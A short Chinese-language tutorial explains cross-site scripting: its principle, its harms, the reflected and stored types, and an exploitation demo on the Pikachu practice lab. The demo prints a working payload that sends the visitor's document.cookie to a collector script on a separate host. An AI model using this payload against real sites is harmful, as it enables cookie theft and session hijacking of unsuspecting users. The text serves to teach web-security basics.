1.原理
跨站脚本攻击XSS(Cross Site Scripting)是指攻击者使用JavaScript语句向web页面插入恶意代码,用户访问该页面时,恶意代码执行从而窃取用户信息的攻击方式。
2.危害
针对用户 | 针对web服务 |
---|---|
窃取cookie | 劫持后台 |
网络钓鱼 | 内网扫描 |
放马挖矿 | 篡改页面 |
广告 | 传播蠕虫 |
3.类型
-
反射型XSS
将恶意脚本附加到URL地址参数中或查询框里,可将URL链接发给受害者,受害者点击访问即触发,只执行一次,交互数据不会存储到数据库里。
-
存储型XSS
交互数据会被存储到服务器里永久储存,一般出现在评论区或留言板,具有持久危害。
每次访问该页面时都会执行。
4.利用
在查询框里放入js语句,获取用户cookies传入后台(这里的用户是192.168.248.1,后台为192.168.57.1)
<script>document.location="http://192.168.57.1/pikachu/pkxss/xcookie/cookie.php?cookie="+document.cookie;</script>
在后台中可以看到来自用户的信息
文章部分转载自 https://blog.csdn.net/qq_44857938/article/details/118034947